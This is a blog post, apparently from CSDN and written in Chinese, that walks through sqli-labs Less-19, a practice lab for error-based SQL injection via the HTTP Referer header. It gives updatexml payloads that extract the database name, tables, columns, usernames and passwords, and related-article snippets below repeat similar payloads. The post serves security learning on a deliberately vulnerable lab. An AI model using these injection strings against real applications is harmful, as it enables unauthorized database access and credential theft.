sqli-labs-less-19 基于http头 Referer 报错注入

最新推荐文章于 2022-11-18 23:10:48 发布
最新推荐文章于 2022-11-18 23:10:48 发布
阅读量281 收藏 1
点赞数
分类专栏: sql注入 文章标签: sql 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/109705961
版权

Less-19

该关卡与less-18类似,只是less-18在登录正确是返回UA信息,而该关卡返回Referer信息,因此做法与less-18类似,只是在抓到的包中将Referer换成我们需要进行查询的sql语句,利用错误注入,将我们需要的信息通过错误返回带出。

判断Referer闭合方式:

将Referer更改为’,返回:
在这里插入图片描述

可以猜测Referer传入后台数据库的语句是insert into table value(‘Referer’,‘ip’)
验证猜想,将Referer更改为1’,1)#
在这里插入图片描述

没有报错,说明猜测正确,接下来开始注入:

查询当前数据库:

‘ or updatexml(1,concat(0x7e,(database())),1),1)#
在这里插入图片描述

查询security中的表:

’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)),1),1)#
在这里插入图片描述

获取users表中的字段:

’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)),1),1)#

获取username的数据:

’ or updatexml(1,concat(0x7e,(select group_concat(username) from security.users)),1),1)#

获取password字段的数据:

’ or updatexml(1,concat(0x7e,(select group_concat(password) from security.users)),1),1)#

未完待续。。。

yzcn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-19HTTP-Referer注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 272
通过在Referer后面加上单引号和双引号测试,猜测SQL语句大致为 insert into xxx(a,b,c) values('','','') 发现这样的payload可以时sql语句正常执行 经过尝试,发现可以使用报错注入,利用extractvalue()函数 成功爆出数据库版本号。 ...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-lab19关基于post的referer报错注入
qq_46527080的博客
12-18 423
知识点 referer: http请求里,有一个referer首部,这个首部可以告知服务端,当前的请求的来源。 就是很直观的说,访问了一个页面,你来自哪里 extractvalue()函数 extractvalue() 函数是对XML文档进行查询的函数 其实就是相当于HTML文件中用 标签查找元素一样 语法:extractvalue(目标xml文档,xml路径) update是更新 extractvalue是查询 第十九关 sqlmap方法: 这里我们还是使用SQLMAP进行注入,将登录请求信息保存到1.
sqli-labs/Less-19
m0_71299382的博客
11-18 213
sqli-labs第十九关
sqli_labs less-19referer注入)
niuniu1996的博客
10-15 877
账户密码一样 bp抓包 修改referer 此处报错是inseret语句 所以使用and '1就可以闭合 查询数据库名
sqli-labs ————less -19
Fly_鹏程万里
05-12 1061
Less-19提交一个测试数据试试:username:adminpassword:aaa由此可以看到出现了Referer,我们不妨来看看源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
Less19 (referer注入)
老司机开代码的博客
08-03 1638
文章目录1. 什么是referer?2. 分析题目3. 手工注入4. SQLmap注入 1. 什么是referer? 简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。 之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。 HTTP请求中的referer字段 2. 分析题目 这关的思路和Less-8几乎是一样的。首先看一下网站源码: $sql="SELECT users.username, user
sqli-labs-less-18 httpuser agent+报错注入
yzcn
11-14 288
Less-18 首先利用burp suite抓包分析: Username和password验证正确时,返回ip地址和user agent信息 验证错误时,只返回ip地址 所以该关卡是user agent的hppt注入, 我们可以构造playload更改数据包 更改user agent: UA作为数据包中的信息,最后又返回出来,说明后台可能使用了insert into函数将UA插入到数据库,然后再进行输出, Insert into table value(v01,v02,) 首先判断UA是否存在注入
sqli-labs】 less19 POST - Header Injection - Referer field - Error based (基于部的Referer POST报错注入)...
ajxi63204的博客
01-26 180
这个和less18一样,都是基于header的注入 这次的字段是referer Referer: 123' AND UpdateXml(1,concat(0x7e,database(),0x7e),1),1)# Referer: 123' AND UpdateXml(1,concat(0x7e,(select table_name from informat...
sqli-labs (less-19)
kukudeshuo的博客
03-11 355
sqli-labs (less-19) 进入19关,输入用户名和密码,发现屏幕回显了我们的IP地址和Referer,根据18关踩得坑,这里我们可以大胆猜想注入点就在Referer里 使用burpsuite抓包 抓包后发现,根本就没有Referer,怎么办呢,没事,我们可以自己添加Referer,添加完后我们输入’试试 系统报错,验证了我们的猜想,也说明了闭合方式为’ or ‘1’='1,并且为字符型注入 查库 后面的过程与less-18完全一样,具体过程请看我的less-18 ...
通过sqli-labs学习sql注入——基础挑战之less11-22
热门推荐
giantbranch的专栏
05-19 1万+
上一次就讲了基础挑战之less1-10,都是get型的,包含的种类也是比较多了,这次的是post型注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战之less1-10会有,这里不会讲以前讲过了知识了,还有盲注的python脚步哦,有需要的链接去看看 工具 还是火狐+hackbar插件 看看要post提交的字段吧,uname和p
HTTP注入漏洞之SQL注入
Jim的博客
08-21 2788
输入参数主要覆盖范围有: HTTP 查询字符参数(GET):输入参数通过URL发送 HTTP 正文参数(POST):输入参数通过HTTP正文发送 HTTP Cookie参数:输入参数通过HTTP cookie发送 HTTP Headers:HTTP提交应用程序使用的,包括User-agent和Referer字段 1.Cookie字段 首部字段Cookie会
HTTP_REFERER的用法及伪造及去掉REFERER方法
yongshenghuang的博客
06-03 5261
HTTP_REFERER的用途 HTTP_REFERER提供了引导用户代理到当前页的前一页的地址信息,常见的一些应用场景有防盗链,统计文章有多少次是来自谷歌搜索结果,多少次来自百度搜索结果等。 下面以防盗链为例,讲讲HTTP_REFERER的用法。 如果你经常写博客,就一定会遇到盗用你辛辛苦苦整理过的文章不跟你打任何招呼甚至连原文链接都一并抹除的网站,文字这个层面我们没法控制,但是图片这个层...
Sqli-labs之Less-18和Less-19
→_→
04-12 3277
Less-18 基于错误的用户代理,部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求:(上一篇文章详细讲过) Host ...
sqli-labs (less18-less19)
Xi4or0uji
08-01 1681
less 18 部注入:user_agent 这里不补充http的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去 有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入 这里给个脚本,其实重点只是s...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值